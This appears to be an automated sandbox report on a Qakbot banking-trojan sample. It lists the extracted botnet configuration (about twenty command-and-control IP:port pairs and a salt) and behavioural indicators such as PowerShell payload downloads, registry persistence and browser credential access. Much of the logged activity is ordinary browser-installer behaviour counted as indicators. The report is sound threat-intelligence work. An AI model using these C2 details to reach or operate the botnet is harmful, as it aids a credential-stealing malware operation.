qakbot | hxxp://indrani-therapy[.]com/rulesupdate/NewRules_GQD5[.]zip

Analysis

max time kernel
2699s
max time network
2699s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2022 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://indrani-therapy.com/rulesupdate/NewRules_GQD5.zip

Score

10^/10

qakbot azd 1672147664 banker discovery persistence spyware stealer trojan upx

Malware Config

Extracted

Family

qakbot

Version

404.62

Botnet

azd

Campaign

1672147664

80.103.77.44:2222

136.35.241.159:443

73.88.173.113:443

186.64.67.12:443

76.80.180.154:995

83.248.199.56:443

125.20.112.94:443

72.80.7.6:995

50.68.204.71:443

90.79.129.166:2222

108.162.6.34:443

86.130.9.250:2222

41.228.225.131:995

86.134.75.5:443

190.249.241.149:443

70.115.104.126:995

84.113.121.103:443

198.2.51.242:993

172.90.139.138:2222

89.115.196.99:443

Attributes

salt
SoNuce]ugdiB3c[doMuce2s81*uXmcvP

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

659 1756 powershell.exe
660 1756 powershell.exe
977 1756 powershell.exe
978 1756 powershell.exe
Downloads MZ/PE file

flow	pid	process
659	1756	powershell.exe
660	1756	powershell.exe
977	1756	powershell.exe
978	1756	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

ChromeRecovery.exeChromeSetup.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exe108.0.5359.125_chrome_installer.exesetup.exesetup.exesetup.exesetup.exeGoogleCrashHandler.exeGoogleCrashHandler64.exeGoogleUpdate.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exeGoogleUpdateOnDemand.exeGoogleUpdate.exeGoogleUpdate.exesetup.exesetup.exesetup.exesetup.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleCrashHandler.exeGoogleCrashHandler64.exeGoogleUpdate.exeGoogleUpdate.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeelevation_service.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

pid	process
600	ChromeRecovery.exe
2460	ChromeSetup.exe
4328	GoogleUpdate.exe
2620	GoogleUpdate.exe
4476	GoogleUpdate.exe
984	GoogleUpdateComRegisterShell64.exe
4448	GoogleUpdateComRegisterShell64.exe
1328	GoogleUpdateComRegisterShell64.exe
2996	GoogleUpdate.exe
796	GoogleUpdate.exe
1608	GoogleUpdate.exe
2688	108.0.5359.125_chrome_installer.exe
876	setup.exe
5028	setup.exe
2524	setup.exe
3724	setup.exe
380	GoogleCrashHandler.exe
3132	GoogleCrashHandler64.exe
1796	GoogleUpdate.exe
4768	software_reporter_tool.exe
4504	software_reporter_tool.exe
4816	software_reporter_tool.exe
4180	software_reporter_tool.exe
4256	GoogleUpdateOnDemand.exe
3520	GoogleUpdate.exe
1316	GoogleUpdate.exe
4988	setup.exe
4996	setup.exe
228	setup.exe
2852	setup.exe
4364	GoogleUpdate.exe
3036	GoogleUpdate.exe
1496	GoogleUpdate.exe
3000	GoogleCrashHandler.exe
1320	GoogleCrashHandler64.exe
1604	GoogleUpdate.exe
4924	GoogleUpdate.exe
752	chrome.exe
2416	chrome.exe
3280	chrome.exe
3312	chrome.exe
4196	chrome.exe
4052	chrome.exe
4664	chrome.exe
3724	chrome.exe
3952	elevation_service.exe
3360	chrome.exe
4508	chrome.exe
2664	chrome.exe
1316	chrome.exe
4112	chrome.exe
748	chrome.exe
3500	chrome.exe
4008	chrome.exe
2884	chrome.exe
3964	chrome.exe
964	chrome.exe
1836	chrome.exe
4644	chrome.exe
4016	chrome.exe
3352	chrome.exe
4848	chrome.exe
2068	chrome.exe
3672	chrome.exe

Modifies Installed Components in the registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

setup.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\108.0.5359.125\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome"	setup.exe

Registers COM server for autorun 1 TTPs 45 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

GoogleUpdateComRegisterShell64.exesetup.exeregsvr32.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeregsvr32.exesetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32\ = "\"C:\\Program Files\\Google\\Chrome\\Application\\108.0.5359.125\\notification_helper.exe\""	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1814CEEB-49E2-407F-AF99-FA755A7D2607}\InProcServer32\ = "C:\\Program Files\\Mozilla Firefox\\AccessibleMarshal.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DCA8D857-1A63-4045-8F36-8809EB093D04}\InProcServer32\ThreadingModel = "Both"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1814CEEB-49E2-407F-AF99-FA755A7D2607}\InProcServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A93460A-1890-407C-B605-184B8281A181}\InProcServer32\ = "C:\\Program Files\\Mozilla Firefox\\notificationserver.dll"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1814CEEB-49E2-407F-AF99-FA755A7D2607}\InProcServer32\ThreadingModel = "Both"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DCA8D857-1A63-4045-8F36-8809EB093D04}\InProcServer32\ = "C:\\Program Files\\Mozilla Firefox\\AccessibleHandler.dll"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{3A93460A-1890-407C-B605-184B8281A181}\InProcServer32	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BABC0FE1-E9B9-49A3-BBE6-3F16B71DC052}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.152\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32\ServerExecutable = "C:\\Program Files\\Google\\Chrome\\Application\\108.0.5359.125\\notification_helper.exe"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DCA8D857-1A63-4045-8F36-8809EB093D04}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe

Sets file execution options in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

GoogleUpdate.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe	GoogleUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0"	GoogleUpdate.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/4856-233-0x0000000000400000-0x0000000000446000-memory.dmp	upx
behavioral1/memory/2632-235-0x0000000000400000-0x0000000000446000-memory.dmp	upx

Checks computer location settings 2 TTPs 20 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeGoogleUpdate.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	GoogleUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	chrome.exe

Loads dropped DLL 64 IoCs

Processes:

GoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exesoftware_reporter_tool.exeGoogleUpdate.exechrome.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

pid	process
4328	GoogleUpdate.exe
2620	GoogleUpdate.exe
4476	GoogleUpdate.exe
984	GoogleUpdateComRegisterShell64.exe
4476	GoogleUpdate.exe
4448	GoogleUpdateComRegisterShell64.exe
4476	GoogleUpdate.exe
1328	GoogleUpdateComRegisterShell64.exe
4476	GoogleUpdate.exe
2996	GoogleUpdate.exe
796	GoogleUpdate.exe
1608	GoogleUpdate.exe
1608	GoogleUpdate.exe
796	GoogleUpdate.exe
1796	GoogleUpdate.exe
4816	software_reporter_tool.exe
4816	software_reporter_tool.exe
4816	software_reporter_tool.exe
4816	software_reporter_tool.exe
4816	software_reporter_tool.exe
4816	software_reporter_tool.exe
4816	software_reporter_tool.exe
3520	GoogleUpdate.exe
3520	GoogleUpdate.exe
1876	chrome.exe
1316	GoogleUpdate.exe
1316	GoogleUpdate.exe
3036	GoogleUpdate.exe
4364	GoogleUpdate.exe
1496	GoogleUpdate.exe
1604	GoogleUpdate.exe
4924	GoogleUpdate.exe
4924	GoogleUpdate.exe
4364	GoogleUpdate.exe
752	chrome.exe
2416	chrome.exe
752	chrome.exe
3280	chrome.exe
3312	chrome.exe
3280	chrome.exe
3312	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
4196	chrome.exe
4196	chrome.exe
4052	chrome.exe
4664	chrome.exe
4664	chrome.exe
3724	chrome.exe
3724	chrome.exe
3360	chrome.exe
3360	chrome.exe
4508	chrome.exe
4508	chrome.exe
4052	chrome.exe
2664	chrome.exe
2664	chrome.exe
4112	chrome.exe
4112	chrome.exe
1316	chrome.exe
748	chrome.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 7 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

NOTEPAD.EXENOTEPAD.EXEcmd.exefirefox.execmd.exeNOTEPAD.EXE

description	ioc	process
File opened (read-only)	\??\E:	NOTEPAD.EXE
File opened (read-only)	\??\E:	NOTEPAD.EXE
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\E:	firefox.exe
File opened (read-only)	\??\F:	firefox.exe
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\E:	NOTEPAD.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1066 ipapi.co
1069 ipapi.co
1070 ipapi.co
1071 ipapi.co
1072 ipapi.co

flow	ioc
1066	ipapi.co
1069	ipapi.co
1070	ipapi.co
1071	ipapi.co
1072	ipapi.co

Drops file in Program Files directory 64 IoCs

Processes:

setup.exeelevation_service.exeChromeSetup.exe108.0.5359.125_chrome_installer.exesetup-stub.exeGoogleUpdate.exesetup.exeGoogleUpdate.exemaintenanceservice_installer.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\de.pak	setup.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4004_1694836645\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_nl.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\CR_28228.tmp\CHROME.PACKED.7Z	108.0.5359.125_chrome_installer.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsd3EC4.tmp	setup-stub.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_hu.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\goopdateres_pt-BR.dll	GoogleUpdate.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\	setup.exe
File created	C:\Program Files\Mozilla Firefox\updater.exe	setup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_de.dll	ChromeSetup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	setup-stub.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_zh-CN.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\goopdateres_lt.dll	GoogleUpdate.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\chrome.7z	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\mozavutil.dll	setup-stub.exe
File opened for modification	C:\Program Files\Mozilla Firefox\libGLESv2.dll	setup-stub.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_es-419.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_pt-BR.dll	ChromeSetup.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\es-419.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\gu.pak	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsy3F01.tmp	setup-stub.exe
File created	C:\Program Files\Mozilla Firefox\Accessible.tlb	setup.exe
File created	C:\Program Files\Mozilla Firefox\libGLESv2.dll	setup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_kn.dll	ChromeSetup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\mozglue.dll	setup-stub.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsd3EC4.tmp	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsy3F01.tmp	setup.exe
File created	C:\Program Files\Mozilla Firefox\mozavcodec.dll	setup.exe
File created	C:\Program Files\Mozilla Firefox\notificationserver.dll	setup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\goopdateres_hu.dll	GoogleUpdate.exe
File opened for modification	C:\Program Files\Mozilla Firefox\lgpllibs.dll	setup-stub.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\goopdateres_es-419.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\GoogleUpdate.exe	GoogleUpdate.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{5E2969C2-AD9F-4D1C-83F7-C87138328842}\108.0.5359.125_chrome_installer.exe	GoogleUpdate.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\da.pak	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\nsh7D3.tmp	setup-stub.exe
File opened for modification	C:\Program Files\Mozilla Firefox\defaults\	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsy3EFC.tmp	setup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_fr.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\GoogleUpdate.exe	GoogleUpdate.exe
File created	C:\Program Files\Mozilla Firefox\precomplete	setup.exe
File created	C:\Program Files\Mozilla Firefox\firefox.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini	maintenanceservice_installer.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsy3F02.tmp	setup-stub.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\mr.pak	setup.exe
File opened for modification	C:\Program Files\Mozilla Firefox\nsh7D3.tmp\	setup-stub.exe
File opened for modification	C:\Program Files\Mozilla Firefox\tobedeleted\nsy3EFF.tmp	setup-stub.exe
File created	C:\Program Files\Mozilla Firefox\libEGL.dll	setup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_et.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_zh-TW.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_sk.dll	ChromeSetup.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\new_chrome.exe	setup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\goopdateres_ar.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.152\psuser_64.dll	GoogleUpdate.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\tr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\Locales\zh-TW.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source876_1467735484\Chrome-bin\108.0.5359.125\WidevineCdm\LICENSE	setup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\GoogleUpdateOnDemand.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM89F3.tmp\goopdateres_pl.dll	ChromeSetup.exe
